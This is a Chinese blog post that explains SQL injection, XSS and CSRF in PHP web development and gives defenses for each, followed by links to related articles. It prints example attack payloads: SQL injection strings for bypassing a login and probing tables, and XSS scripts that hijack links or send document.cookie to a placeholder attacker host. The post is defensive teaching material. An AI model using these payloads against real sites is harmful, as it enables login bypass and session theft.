浅谈web开发的安全问题

最新推荐文章于 2024-04-23 10:05:03 发布
最新推荐文章于 2024-04-23 10:05:03 发布
阅读量526 收藏 1
点赞数
分类专栏: web安全 文章标签: csrf sql注入 web开发 xsrf 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qd1993102/article/details/45114597
版权

一、sql注入


解释:用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQLInjection,即SQL注入。


如:

比如用户登录例子,在用户名一栏输入ddd'OR 1=1;#,查询结果就会把所有用户的列表给列出来,绕过密码验证。

猜测表名,如插入ddd'OR (select count(*) from user)>0;#,通过返回结果猜测表的名字。

当知道表的名字后,可以开始验证表结构,如插入ddd'OR `username` IS NOT NULL;#,通过结果是否报错确定表结构;

接着灌水,等等。。。


防御:

1、使用mysqlipdomysql扩展,使用sql预处理,如pdo预处理

$query= "SELECT * FROM user WHERE `username`=? AND `password`=?;";

$stmt= $dbh->prepare($query);

$stmt->execute(array($username,$password));

2、使用转义函数,如mysql_real_escape_stringaddslashes,如

$username= mysql_real_escape_string($_POST['username']);

$password= mysql_real_escape_string(md5($_POST['password']);

二、xss攻击(CrossSite Scripting跨站攻击)


解释xss表示CrossSiteScripting(跨站脚本攻击),它与SQL注入攻击类似,SQL注入攻击中以SQL语句作为用户输入,从而达到查询/修改/删除数据的目的,而在xss攻击中,通过插入恶意脚本,实现对用户游览器的控制。


恶意插入文案:

<fontcolor='red'>哈哈哈</font>

恶意修改钓鱼链接:

<script>window.οnlοad=function(){document.links[0].href='xxx.attack-site.com'}</script>

盗取cookie

<script>(function(){vars =document.createElement('script');s.src='xxx.attack-site.com/saveCookie.php?c='+escape(document.cookie);document.body.appendChild(s);})()</script>


ps:谷歌安全机制CSP可以检测xss攻击代码,详情请移步http://drops.wooyun.org/tips/1439


防御:

1、使用内置过滤函数,如htmlspecialcharsstrip_tagsaddslashes

2、使用正则匹配html代码匹配和过滤字符

ps对于使用addslashes时,要去掉添加的反斜杠时,要使用stripslashes函数来去除




三、csrf攻击(Cross-siterequest forgery跨站伪造请求)


解释:CSRFCross-siterequest forgery跨站请求伪造,也被称为“oneclick attack”或者session riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本XSS),但它与XSS非常不同,并且攻击方式几乎相左。XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性。


如:

在线刷票,通过登录大量用户,将用户参数提交到相应api进行刷票。

学校网络公选课,爬虫抓取页面用户id和课程examid,提交到相应的api进行刷课。


防御:

1、进行手动客户端验证,验证客户端header的数据,如ipuarefere、时间戳等信息,确认是否是合理客户端。

2、提交参数添加token,后端将token存在session或者缓存中,前端通过密钥、应用信息、时间戳算出token,隐藏提交token(其实也不安全),后台拦截token并验证。

3、自定义http头属性,可以与上述token方法结合,如XMLHttpRequest对象使用函数setRequestHeaderjquery在事件beforeSend里填写相应操作

4、使用认证协议,如kerberoscas等,各个开发平台还要安装各自的扩展,详情移步

kerberoshttp://idior.cnblogs.com/archive/2006/03/20/354027.html

http://gost.isi.edu/publications/kerberos-neuman-tso.html


cashttp://www.cas.org/

冰原上的小草
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
基于Ajax技术的Web 2.0开发应用
07-30
Ajax技术的出现将基于Web的应用程序开发带进了一个全新的阶段,但Ajax主要是基于JavaScript的客户端技术,所以客户端的开发显得越来越臃肿,随之而来的安全性等一系列问题有待进一步研究。
web应用存在的10大安全问题
zhusongziye的博客
11-04 9135
 1 在web应用程序中是什么导致安全问题呢?一般有以下几个原因 1、复杂应用系统代码量大、开发人员多、难免出现疏忽 2、系统屡次升级、人员频繁变更,导致代码不一致 3、历史遗留系统、试运行系统等多个Web系统共同运行于同一台服务器上 4、开发人员未经过安全编码培训或者公司根本就没有统一的安全编码规范 5、测试人员经验不足或者没经过专业的安全评估测试就发布上线 6、没有对用户的输入进行验证: ...
浅谈 web开发安全
weixin_41421227的博客
11-04 1999
很多时候很多企业 尤其是初创企业在进行项目开发的过程中为了能尽快的实现项目上线赚钱,往往都是会忽视掉如何安全的去开发,一开始企业业务没做大还好,等业务做大了就漏洞百出,各种修补,由市场去检验到的安全问题往往意味着损失已经发生,所以在项目设计到开发安全这块考虑进去是非常重要的。 一般前端在开发中应该如何做到安全开发呢?以下总结了下我的开发经验: 1.防止关键接口按钮无限点击 危害:假如不...
web安全的重要性
qq165285727的专栏
11-30 2397
经常看到在项目中ajax post提交数据到服务器不加防伪标记,造成CSRF攻击,在ajax提交数据的时候,可以添加令牌环,进行数据提交的安全验证,这样可以防止CSRF攻击,提高网站安全性。      有很多程序员在进行项目开发的时候,对应数据删除和修改的时候,只传递一个Id到数据层,进行返回数据是不够的,这样容易被有恶意的人,直接通过修改Id进行数据改动,最好是数据删除和修改的时候,传递用户
菜鸟浅谈——web安全测试
热门推荐
u010559128的博客
02-27 5万+
本文仅为小白了解安全测试提供帮助 一:安全测试注意事项 1)要注意白帽子与黑客之间的区别 2)在挖漏洞挣外快时,注意不要使用安全扫描或暴力破解软件对上线网站进行扫描或攻击。 不要对上线网站造成破坏,不要去获取网站的数据库信息等。否则等待的不是money,而是牢狱啦~~ 二:web介绍 1)world wide web 万维网,也被叫做www(3w),非常普遍的互联网应用,每天都有数以亿万...
web开发常见安全问题
atree1987的专栏
04-18 3861
xss注入 概念XSS又叫CSS(Cross Site Script),跨站脚本攻击。指的是恶意攻击者往web页面里插入恶意脚本代码,而程序对于用户输入内容没有过滤,当用户浏览时,嵌入的脚本代码被执行,达到恶意攻击用户的目的。 分类XSS漏洞可分为反射型XSS和存储型XSS。反射型XSS是直接将恶意代码的执行结果反射给浏览器,而存储型XSS是将恶意代码存储在服务器端,再输出给前端页面。任何用户访问该
浅谈移动金融业务外包开发中的信息安全风险.pdf
09-18
浅谈移动金融业务外包开发中的信息安全风险 工控安全 安全体系 安全众测 安全运营 安全方案与集成
悬镜安全李浩:浅谈IAST如何赋能企业开发安全.pdf
09-18
悬镜安全李浩:浅谈IAST如何赋能企业开发安全 移动安全 安全人才 web安全 攻防实训与靶场 安全实践
安全开发浅谈企业安全防护体系中的渗透预警与追溯分析 - 数据治理.zip
11-27
安全开发浅谈企业安全防护体系中的渗透预警与追溯分析 - 数据治理 安全众测 应急响应 安全热点 NGFW 勒索病毒
浅谈php安全性需要注意的几点事项
01-21
在放假之初,我抽时间看了《白帽子讲web安全》,吴翰清基本上把web安全中所有能够遇到的问题、解决思路归纳总结得很清晰,也是我这一次整体代码安全性的基石。 我希望能分如下几个方面来分享自己的经验 把握整站的...
网络安全CSRF&SSRF漏洞(上篇)(技术进阶)
weixin_70911257的博客
04-17 425
CSRF(Cross-site request forgery)简称:跨站请求伪造,存在巨大的危害性。是攻击者制造一个请求(一般是一个链接)诱导用户去点击,从而通过用户去访问正常的网站用攻击者伪造的请求去对网站发送一个请求。攻击的前提:1,有这个漏洞(自己弄个号来攻击自己,成功了就说明有这个漏洞)2,用户已经登录了3,要知道协议包的结构(不然怎么伪造请求呢)4,浏览器支持(如没有同源策略)5,用户点击并打开恶意网站皮卡丘靶场为例:环境:受害者为主机,虚拟机搭建恶意网站
CSRF 跨站请求伪造
m0_69043895的博客
04-19 788
CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比更具危险性。
跨站攻击CSRF实验
weixin_52654869的博客
04-20 186
再将抓到的包发到Repeater上,对请求中的Referer进行修改,修改成和url一样的地址,修改成功。将get响应的url地址复制,发到网页上(Low等级到这完成)然后重新登录后输入新的密码就可以进入了。可以弹框得到当前的token值。复制粘贴到这个位置并修改密码。High级别:先修改等级。Login后重新输入密码。
安装SSL证书之后还会有不安全提示怎么办?
JoySSL230907的博客
04-20 740
在这里,你可以申请到免费单域名证书、免费多域名证书以及免费通配符证书。在这里,你可以申请到免费单域名证书、免费多域名证书以及免费通配符证书。- 证书链完整性:确保您不仅安装了主证书,还包含了所有必要的中间证书。缺少中间证书可能导致浏览器认为证书不可信。- 清除浏览器缓存:浏览器可能缓存了旧的或错误的证书信息,清除缓存有助于加载新安装的证书。永久免费SSL证书_永久免费https证书_永久免费ssl证书申请-JoySSL。永久免费SSL证书_永久免费https证书_永久免费ssl证书申请-JoySSL。
如何在Android应用中安全地使用SQLite数据库,并通过SQLCipher进行加密保护
轻描时光
04-23 23
Android内置SQLite轻量级关系型数据库,可以在Android应用中存储、检索和管理结构化数据。SQLite是一个无服务器的、零配置的、事务性的SQL数据库引擎,非常适合用于移动设备和桌面应用程序中。:SQLite不需要单独的服务器进程或操作系统级别的配置。可以直接读写磁盘上的文件,非常高效且适合在资源有限的移动设备上使用。:SQLite支持ACID事务,提供了原子性、一致性、隔离性和持久性。保证了即使在发生故障的情况下,数据的完整性也能得到维护。
黑龙江—等保测评三级安全设计思路
2403_84237550的博客
04-19 764
本方案在对信息系统可能面临的安全威胁进行分析的基础上,结合安全域的划分,从物理层、网络层、系统层、应用层、数据层和管理层几个安全层面进行了整体的安全设计,在整体保障框架的指导下,综合多种有效的安全防护措施,进行多层和多重防御,实现纵深防御。3、体现了分域防护的思想。不同的安全等级要求具有不同的基本安全保护能力,实现基本安全保护能力将通过选用合适的安全措施或安全控制来保证,可以使用的安全措施或安全控制表现为安全基本要求,依据实现方式的不同,信息系统等级保护的安全基本要求分为技术要求和管理要求两大类。
跨境电商测评攻略:如何安全有效地提升业绩?
zcwz888的博客
04-23 183
但自养号需要解决技术层面的问题,如果是买设备或者软件这种,可能上一秒还能用,下一秒就因为平台风控的原因批量封号,因为平台会通过ip 获取到设备的型号,地区码,监管码,主板码,WIFI地址,甚至是颜色,指纹码,IP地址等等大概几十个参数,参数关联后,触发平台机审,导致的砍单,封号。这时候要好好规划一下测评的事情,做美客多到最后你会发现,测评是最有效果的,因为测评的本质就是玩弄流量,模仿用户的真实行为让流量变得更多,从而得到跨境电商平台规则的加成,竞争激烈的产品不测评和别人竞争。
从智能家居到智能城市:物联网中的隐私和安全风险
网络安全服务提供商
04-19 651
由于隐私和安全这些问题,已经变得与物联网相关的设备不同的程度上挂钩。例如,黑客可能通过使用物联网设备拦截人们的传输数据来获取身份信息和敏感的个人信息,或利用智能交通系统的漏洞,让整个城市的交通陷入混乱。由于没有标准,就模糊了设备和系统的安全和隐私标准,限制了智能家居和智能城市的持续发展。其次,我们需要建立更多的标准和规范来规范物联网的发展,从而进一步提高物联网设备和技术的安全性和互操作性。通过不断更新技术,加强安全和隐私的保护,我们可以享受到物联网设备和技术带来的便利性,从而更好地掌控我们的生活。
vue2 顶象 安全 验证码的使用
最新发布
lele66688888的博客
04-23 111
类似与这样的登录之前的验证 滑动一个盒子了 或者是 顺序点击文字了 等。
浅谈软件开发与软件测试
11-09
开发和软件测试是软件工程中两个非常重要的环节。软件开发是指通过一系列的过程和方法,将软件需求转化为可执行的软件程序的过程。而软件测试则是在软件开发过程中,通过一系列的测试活动,检查和评估软件的质量和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值